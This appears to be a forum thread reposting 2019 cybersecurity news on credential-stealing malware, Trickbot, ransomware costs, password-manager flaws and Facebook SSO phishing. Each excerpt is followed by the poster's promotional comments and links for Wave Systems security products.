The batch file then runs four executable tools that are used for legitimate purposes. This first two executables are password-dumping tools from security research organization SecurityXploded. The third executable runs the legitimate NcFTP client to upload pilfered data to previously configured accounts on the Free Hostia hosting service. The fourth executable bundles the legitimate xcopy.exe, attrib.exe, and sleep.exe apps it needs to perform mundane tasks.
An email-password dump with redacted credentials and ipconfig data.
Enlarge / An email-password dump with redacted credentials and ipconfig data.
Deep Instinct
"As can be seen above, the attackers make no attempt to hide their intentions and use no obfuscation or evasion techniques," Propper wrote. "In addition, all the output file names and credentials used by the attackers are hard-coded in the scripts."
Turning the tables on the bad guys
The hard-coded credentials allowed Deep Instinct to turn the tables on the attackers and access two of the accounts they used to store the pilfered data. The researchers later gained access to eight other accounts. As of Tuesday afternoon, the accounts stored credentials belonging to about 1,000 individuals and 200 organizations. The number of collected credentials has steadily grown over the course of the past few weeks, and the researchers suspect there may be additional accounts storing still more.
So far, Propper said, officials at Freehostia haven't responded to private messages from Deep Instinct reporting the abuse of the hosting service. A message Ars sent Freehostia seeking comment for this post also went unanswered. Propper said Deep Instinct has notified infected individuals and organizations that their credentials have been harvested.
About the only thing required for the recent Separ campaign to succeed, at least initially, was for an end user to click on a disguised executable. Propper said, over time, a growing number of antimalware providers has come to detect the attack. Still, the ongoing attacks are a reminder that—despite the growing sophistication of many of today's malware attacks—simple, sparse hacks remain painfully effective.
=================================================================
This is not the first 'malware/stolen credentials' situation that has come up in the past so a proactive approach in using Wave VSC 2.0 could prevent stolen credentials from inappropriate access (hacker needs the second factor - TPM) and Wave Endpoint Monitor could prevent 'sneaky' malware attacks from even collecting the stolen credentials.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
=================================================================
These two Wave solutions could provide much better cybersecurity to the ongoing problem in the article above.
Russian cyberattackers are in and gone in less than 20 minutes
https://www.scmagazine.com/home/network-security/russian-cyberattackers-are-in-and-gone-in-less-than-20-minutes/
Russian threat actors are almost eight-times faster at taking advantage of a compromised system compared to other nation-state actors, a tribute to their operational tradecraft, according to Crowdstrike’s 2019 Global Threat report.
An analysis of what Crowdstrike calls “breakout time” shows the Russians are quicker, by a factor of eight, at moving laterally through a system and accomplishing their primary objectives then their next closest competitor, the North Koreans.
The report noted this level of accomplishment is even more impressive considering the North Korean threat teams themselves are twice as fast as the third-place Chinese crews. Iran was the fourth quickest while various cybercrime actors were fifth. Russians are typically able to do this in just under 19 minutes, compared to two and a half hours for the North Koreans and four hours eight minutes for the Chinese.
One bit of good news in this category is that overall the average breakout time across all threats in 2019 was four hours and 37 minutes, more than twice as long as the one hour and 58 minutes logged by Crowdstrike in 2017. The report credited two possible factors for this jump. An increase in the number of slower attackers and more organizations deploying next-generation endpoint security.
In order to combat effective attackers like the Russians, Crowdstrike recommends companies employee the 1-10-60 rule. This requires an intrusion be detected in under a minute, a full investigation be performed in 10 minutes and the adversary eradicated from the system within an hour.
=================================================================
Isn't it about time that organizations employ a better rule? Only known devices allowed on a sensitive network! (see link below for known devices) The 1-10-60 rule is a labor intensive rule, and how effective is it really? Wave VSC 2.0 - Better security at less than half the cost!! Links below reveal solutions from Wave that should have enabled a new paradigm some time ago!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-self-encrypting-drive-management
The Average Ransomware Payment Is Rising
https://www.infosecurity-magazine.com/infosec/the-average-ransomware-payment-is-1?utm_source=twitterfeed&utm_medium=twitter
The average ransomware payment is growing as criminals become more sophisticated in their attacks, according to a report released by ransomware incident response company Coveware.
According to Coveware’s Q4 2018 Global Ransomware Marketplace Report, the average ransom increased by 13% to $6733 in Q4 2018 compared to Q3’s $5973.
It's difficult to judge the statistical margin of error for these figures because the company, which bases the data on ransomware cases handled by its support team, doesn't divulge the exact number of ransomware cases that it has dealt with. However, it says that the increase is probably down to the more targeted nature of recent attacks. Attackers focused on larger targets and honed their attacks using social engineering, it explains. It pointed to the rising use of ransomware strains that tend to demand higher ransoms, like SamSam and Ryuk.
The average ransomware incident lasted 6.2 days and cost $54,904 in downtime, according to the company, which said that the average ransomware-related downtime increased 47% over Q3.
The biggest factor in that increasing downtime is the rising number of compromised backup systems. 75% of organizations that paid a ransom had their backups encrypted by ransomware too, the company said.
Professional services was the hardest-hit sector at 22.4%, followed by software services (13.8%) and financial services and healthcare, the latter two sectors each garnering 12.1%.
“We also observed an increase in local healthcare facilities being targeted," the report said. "These attacks typically caused the facility to close their doors until critical scheduling and patient EMR servers could be recovered.”
Coveware calls itself a “first responder” for ransomware incidents. One of its services includes ransomware payments. The company will facilitate a rapid payment so that customers get their files back. The report claims that 93% of ransomware crooks sent a decryption tool upon receipt of a ransom payment. On average, victims were able to recover around 95% of their data with these tools.
==================================================================
Organizations should have their SEDs initialized (can be done remotely by Wave SED management) to stop ransomeware. This article shows in addition to the headaches saved, they could save monetarily by having their SEDs with Wave SED management!!
==================================================================
Link below summarizes the many great features of Wave SED management including initializing remotely!
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Password manager flaws can expose data on compromised devices, report says
https://www.scmagazine.com/home/security-news/password-manager-flaws-can-expose-data-on-compromised-devices-report-says/
Flaws in top password managers can expose the very data they are supposed to protect, a study by researchers at Independent Security Evaluators (ISE) researchers found.
“100 percent of the products that ISE analyzed failed to provide the security to safeguard a user’s passwords as advertised,” ISE CEO Stephen Bono said in a release announcing the findings of “Under the Hood of Secrets Management. “Although password managers provide some utility for storing login/passwords and limit password reuse, these applications are a vulnerable target for the mass collection of this data through malicious hacking campaigns.”
Assessing the underlying functionality of 1Password, Dashlane, KeePass and LastPass on Windows 10, researchers discovered that in some cases, the master password could be found in plaintext in the computer’s memory when the password manager was locked and that they could extract the master password using standard memory forensics.
“Given the huge user base of people already using password managers, these vulnerabilities will entice hackers to target and steal data from these computers via malware attacks,” ISE Lead Researcher, Adrian Bednare said, noting that once hackers get their hands on the master password, “it’s game over.”
Sandor Palfy, LastPassCTO, said in a statement sent to SC Media that the “particular vulnerability, in LastPass for Applications, the company’s “legacy, local Windows Application (which accounts for less than .2 percent of all LastPass usage) was brought to our attention by researchers through our Bug Bounty Program.”
He explained that to be able to “read the memory of an application, an attacker would need to have local access and admin privileges to the compromised computer.” The company has“already implemented changes to LastPass for Applications designed to mitigate and minimize the risk of the potential attack detailed in this report,” said Palfy. “To mitigate risk of compromise while LastPass for Applications is in a locked state, LastPass for Applications will now shut down the application when the user logs out, clearing the memory and not leaving anything behind.”
He said there’s no indication that sensitive LastPass user data was compromised. “As always, delivering a secure service for our users remains our top priority and we will continue to work with the security community to respond and fix potential vulnerability reports as quickly as possible,” said Palfy.
Dashlane CEO Emmanuel Schalit said the scenario outlined by the ISE researchers “is that of an attacker who would have taken total control of a user’s device,” a standard question in security not limited to Windows 10 but which “applies to any operating system and any digital device connected to the internet” and which are known to security pros as part of the security audit.
The company, in fact, has included the scenario in one of its whitepapers. “Even if consumers most likely do not read our security whitepapers, most of the large business clients that have adopted our (or any other identity management solution) are well aware of this type of scenario as part of their security audits,” Schalit said.
“It is indeed correct that if an attacker has full control of a device at the lowest operating systems level, the attacker can read any and every information on the device,” he said. “This is not the case just with Dashlane or with password managers, but of any software or in fact any device that stores digital information. In such a case, the attacker can also see everything that is typed by the user including passwords and credit card numbers, any information being exchanged by the device over the internet even if it is sent over https, any information the device is able to capture(audio, video, etc.) through the hardware attached to it, regardless of whether the user employs a password manager or not.”
While no mechanism can protect digital information on a fully compromised device, Schalit explained that data stored by Dashlane on a “device(i.e. on the hard drive) is encrypted and cannot be read by an attacker even if the attacker has full control of the device. This only applies to the data present in the memory of the device when Dashlane is being used by a user who has typed the Master Password.”
He warned against recommending people not use software or technology unless it’s 100 percent foolproof. “This leads to consumers having no protection against the most common threats (reusing passwords that can be stolen in large quantity online by hackers who target millions of consumers in one attack) for fear of a much less likely threat(an attacker being able to specifically take control of the device of a single user),” he said, noting the very real security problems caused by consumer apathy. “At the end of the day the only real protection against a scenario where an attacker has fully compromised a device is to not use that device.”
==================================================================
Wave VSC 2.0 could be a much better alternative than password managers in the enterprise since the user's credentials are secured in the TPM (hardware)!!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Windows 7 users: You need SHA-2 support or no Windows updates after July 2019
https://www.zdnet.com/article/windows-7-users-you-need-sha-2-support-or-no-windows-updates-after-july-2019/
Microsoft will begin rolling out SHA-2 standalone updates for Windows 7 and Windows Server 2008 in March in preparation for its July 16 implementation deadline.
Windows 7 and Windows Server 2008 users need to have SHA-2 code-signing installed by July 16, 2019, in order to continue to get Windows updates after that date. Microsoft issued that warning on February 15 via a Support article.
Windows operating system updates are dual-signed using both the SHA-1 and SHA-2 hash algorithms to prove authenticity. Bug going foward, due to "weaknesses" in SHA-1, Microsoft officials have said previously that Windows updates will be using the more secure SHA-2 algorithm exclusively. Customers running Windows 7 SP1, Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 must have SHA-2 code-signing support installed by July 2019, Microsoft officials have said.
Microsoft has published a timeline for migrating these operating systems to SHA-2, with support for the algorithm coming in standalone updates. On March 12, Microsoft is planning a standalone update with SHA-2 code sign support for Windows 7 SP1 and Windows Server 2008 R2 SP1. It also will deliver to WSUS 3.0 SP2 the required support for delivering SHA-2 updates.
Microsoft will make available a standalone update with SHA-2 code sign support for Windows Server 2008 SP2 on April 9, 2019.
On June 18, Windows 10 updates -- 1709, 1803, 1809 and Server 2019 -- will have their signatures changed from dual-signed SHA-1/SHA-2 to SHA-2 only with no customer action required.
The full cut-over timetable is available on Microsoft's support page.
SHA-1, or Secure Hash Algorithm 1, was introduced by the National Security Agency in 2002. It has been used in SSL certificates, encrypted communications and code revision-control systems. SHA-2 uses SHA-1's algorithm, but it uses different input and output sizes for far superior security. Microsoft began blocking sites signed with SHA-1 certificates in its Edge and IE browsers back in 2017.
==================================================================
Since the Windows 7 computer, if upgraded to Windows 10, would still have the TPM 1.2 (SHA-1), Microsoft would be very strongly pushing companies to buy new Windows 10 computers (TPM 2.0, SHA-2) by July, 2019. Many organizations for financial and logistical reasons would need to stay with Windows 7 and Wave Endpoint Monitor (WEM) could be a great solution to spot malware in these systems that lack software updates! Of course, buying Windows 10 computers with SEDs and Wave SED management to stop ransomware in addition to its other features could be another great solution for organizations.
Waves' solutions could greatly enhance the cybersecurity for Windows 7-10 computers and tablets!
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/
Trickbot becomes one of the most dangerous pieces of modular malware hitting enterprises
https://www.helpnetsecurity.com/2019/02/14/trickbot-business-threat/
Along with Emotet, Trickbot has become one of the most versatile and dangerous pieces of modular malware hitting enterprise environments.
Most recently, its creators have added another dangerous module to it, which allows it to extract and exfiltrate credentials from popular remote access software.
Trickbot’s evolution
Like Emotet, Trickbot started as a pure banking Trojan but was slowly developed through the years and now has many more additional capabilities. It can:
•Achieve persistence (through scheduled tasks)
•Disable Microsoft’s built-in antivirus Windows Defender
•Gather email addresses and send out spam
•Gather system and memory information, user accounts, lists of installed programs and services
•Fingerprint browsers and collect data from them (including passwords)
•Steal passwords from Microsoft Outlook and file transfer apps like WinSCP and Filezilla
•Spread itself to other computers on the same network by exploiting SMB vulnerabilities with the EternalRomance exploit.
Apart from propagating itself via SMB exploits, Trickbot is often dropped by Emotet as a secondary payload. It also arrives in targets’ inboxes via emails carrying malicious URLs and booby-trapped attachments (Word documents with macros).
A new capability
As mentioned before, the latest variant of the malware has acquired a new capability: stealing VNC, PuTTY and RDP credentials.
It extracts VNC credentials from *.vnc.lnk files, PuTTY credentials from saved connection settings, and RDP credentials by taking advantage of the CredEnumerateA API.
The information is then exfiltrated to C&C servers and later likely used to achieve continuous access to infected hosts and/or the network and, apparently, to deliver Ryuk ransomware, which specializes in targeting enterprises.
“These new additions to the already ‘tricky’ Trickbot show one strategy that many authors use to improve the capabilities of their creations: gradual evolution of existing malware,” Trend Micro researchers noted.
“While this new variant is not groundbreaking in terms of what it can do, it proves that the groups or individuals behind Trickbot are not resting on their laurels and continuously improve it, making an already-dangerous malware even more effective.”
Dealing with Trickbot
Most users are unlikely to notice that they’ve been infected with Trickbot, so it’s on enterprise administrators to detect the malware communicating with its C&Cs and exfiltrating data to them, and to clean the infected machines.
Despite security awareness and anti-phishing trainings, sooner or later this or that employee will fall for a malicious email and download Trickbot (or other malware). Patching the SMB vulnerabilities these various threats uses to propagate laterally on the network is a must to prevent constant reinfections.
==================================================================
The very potent combination of Wave solutions in Wave Endpoint Monitor and Wave VSC 2.0 could be a tremendous help to the situation in the above article! And disabling antivirus software is not good! The summaries in the links below show why these Wave solutions would be a tremendous help!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
Behold, the Facebook phishing scam that could dupe even vigilant users.
https://arstechnica.com/information-technology/2019/02/behold-the-facebook-phishing-scam-that-could-dupe-even-vigilant-users/
HTML block almost perfectly reproduces Facebook single sign-on Window.
Phishers are deploying what appears to be a clever new trick to snag people’s Facebook passwords by presenting convincing replicas of single sign-on login Windows on malicious sites, researchers said this week.
Single sign-on, or SSO, is a feature that allows people to use their accounts on other sites—typically Facebook, Google, LinkedIn, or Twitter—to log in to third-party websites. SSO is designed to make things easier for both end users and websites. Rather than having to create and remember a password for hundreds or even thousands of third-party sites, people can log in using the credentials for a single site. Websites that don’t want to bother creating and securing password-based authentication systems need only access an easy-to-use programming interface. Security and cryptographic mechanisms under the hood allow the the login to happen without the third party site ever seeing the username password.
Researchers with password manager service Myki recently found a site that purported to offer SSO from Facebook. As the video below shows, the login window looked almost identical to the real Facebook SSO. This one, however, didn’t run on the Facebook API and didn’t interface with the social network in any way. Instead, it phished the username and password.
Just add HTML
One of the ingredients that made the login window look so real is that it almost perfectly reproduced what users would see if they were encountering a genuine Facebook SSO, such as the one to the right of this text. The status bar, navigation bar, shadows, and HTTPS-based Facebook address all appear almost exactly the same. The Window presented on the phishing page, however, was rendered using a block of HTML, rather than by calling an API that opens a real Facebook window. As a result, anything typed into the fake SSO page was funneled directly to the phishers.
While the replica is convincing, there was one easy way any user could immediately tell it was a fake. Genuine SSOs from Facebook and Google can be dragged outside of the Window of the third-party site without any part of the login prompt disappearing. Portions of the fake SSO, by contrast, disappeared when doing this. Another tell-tale sign for Myki users, and likely users of other password managers, was that the autofill feature of the password manager didn’t work, since contrary to the address showing in the HTML block, the actual URL the users were visiting wasn’t from Facebook. More advanced users almost certainly could have spotted the forgery by viewing the source code of the site they were visiting, too.
The convincing forgery is yet another reminder that attacks only get better. It also reaffirms the value of using multi-factor authentication on any site that offers it. A password phished from a Facebook account that used MFA protection would have been of little use to attackers since they wouldn’t have had the physical key or smartphone that’s required when logging in from a computer that has never accessed the account before. Facebook has more tips for dealing with phishing here.
==================================================================
Here are a couple of Wave Solutions that could have a positive impact on this Facebook problem:
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpts:
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
=================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
Key Features:
Strong Security
Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
88% of UK businesses breached during the last 12 months
https://www.helpnetsecurity.com/2019/02/12/uk-breaches-increasing/
The UK’s cyber threat environment is intensifying. Attacks are growing in volume, and the average number of breaches has increased, according to Carbon Black.
Key survey research findings:
•88% of UK organizations reported suffering a breach in the last 12 months
•The average number of breaches per organization over the past year was 3.67
•87% of organizations have seen an increase in attack volumes
•89% of organizations say attacks have become more sophisticated
•93% of organizations plan to increase spending on cyber defence
Compared with the previous report, published in September, the average number of breaches has increased from 3.48 to 3.67. More than 5% of organizations have seen an increase in attack volumes.
100% of Government and Local Authority organizations surveyed reported being breached in the past 12 months, suffering 4.65 breaches, on average. 40% have been breached more than five times. In the private sector, the survey indicates that Financial Services are the most likely to report a breach, with 98% of the surveyed companies reporting breaches during the past 12 months.
“We believe our second UK threat report underlines that UK organizations are still under intense pressure from escalating cyberattacks,” said Rick McElroy, Head of Security Strategy for Carbon Black. “The report suggests that the average number of breaches has increased, but as threat hunting strategies start to mature, we hope to see fewer attacks making it to full breach status.”
The weakest link in cybersecurity: humans
According to the report, malware remains the most prolific attack type in the UK, with more than a quarter (27%) of organizations naming it the most commonly encountered. Ransomware holds second position (15%). However, the human factor plays a part in the attacks resulting in breaches.
Phishing attacks appear to be at the root of one in five successful breaches. Combined, weaknesses in processes and outdated security technology were reported factors in a quarter of breaches, indicating that failures in basic security hygiene continue to be high risk vectors that organizations should address as a priority.
Cyber defence investment increases in the face of increasing attack volumes
Organizations across all sectors reported increases in the volume of attacks during the past 12 months. However, of the organizations surveyed Government and Local Authority organizations saw particularly high increases, with 40% noting more than 50% increase in the number of attacks. Similarly, in Healthcare, 29% of respondents noted increases of 50% or more.
A silver lining here is that 6% more of the organizations plan to increase cybersecurity spending compared to six months ago.
Threat hunting is delivering on its promise
60% of UK organizations surveyed said they are actively threat hunting and more than a quarter (26%) have been doing so for a year or more. A very encouraging 95% reported that threat hunting has strengthened their defences. The survey results suggest that threat hunting is most mature in the financial services sector, with 53% threat hunting for more than a year.
“We believe threat hunting is an integral part of a mature security posture,” McElroy said. “It’s encouraging to see this numbers continuing to climb.”
=================================================================
Given the success rate of cybersecurity technology implied in the title of this article, why not use solutions such as Waves' to get the job done!
Problem Solution
Malware Wave Endpoint Monitor
Ransomware SEDs and Wave SED Management
Phishing Attacks Wave VSC 2.0
unknown devices on network Wave ERAS
=================================================================
These links have great summaries for the applicable Waves' solutions above:
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
=================================================================
*** Post #245613 has information on ransomware.
The Drive Trust Alliance PR below on ransomware explains further. Wave SED management can remotely initialize the SED drive. From the article below: "If these are properly initialized, there is little or no danger of these ransomware attacks."
Drive Trust Alliance Announces Free Fix for Lurking Ransomware Threats
https://www.prnewswire.com/news-releases/drive-trust-alliance-announces-free-fix-for-lurking-ransomware-threats-300569969.html